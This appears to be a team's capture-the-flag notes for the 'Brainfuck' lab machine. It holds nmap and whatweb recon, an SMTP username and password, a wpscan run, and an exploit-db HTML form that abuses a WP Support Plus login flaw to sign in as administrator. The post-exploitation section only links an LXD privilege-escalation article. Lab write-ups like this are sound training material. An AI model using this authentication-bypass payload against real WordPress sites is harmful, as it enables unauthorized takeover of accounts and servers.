# BRAINFUCK
[TOC]
## RECON
Carlos:
```
nmap -p- -sS --min-rate 5000 -Pn -n -vvv --open 10.10.10.17 -oG ports.gp
cat ports.gp | grep -o "[0-9]*/open/tcp" | cut -d "/" -f1 | tr "\n" ","
sudo nmap -p22,25,110,143,443 -sV -sC --min-rate 5000 -Pn -n -vvv 10.10.10.17 -oN ports_recon.txt
```
admin
orestis@brainfuck.htb
Marc:
PORT 443
```
sites: https://brainfuck.htb/
https://sup3rs3cr3t.brainfuck.htb/
```
```
whatweb https://brainfuck.htb/
https://brainfuck.htb/ [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]
```
```
INFO:
SMTP:
orestis
kHGuERB29DNiNE
```
Sergio:
## Exploitation
Carlos:
Marc:
WordPress
```
wpscan --disable-tls-checks --url https://brainfuck.htb/ -e ap,u,dbe --api-token <your wpscan API token>
```
```
version: 4.7.3
interesting plugins:
- WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
```
```
https://www.exploit-db.com/exploits/41006
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
```
```
python3 -m http.server
username=admin
refresh the WordPress page
```
Sergio:
## Post-Exploitation
Carlos:
https://www.hackingarticles.in/lxd-privilege-escalation/
Marc:
Sergio: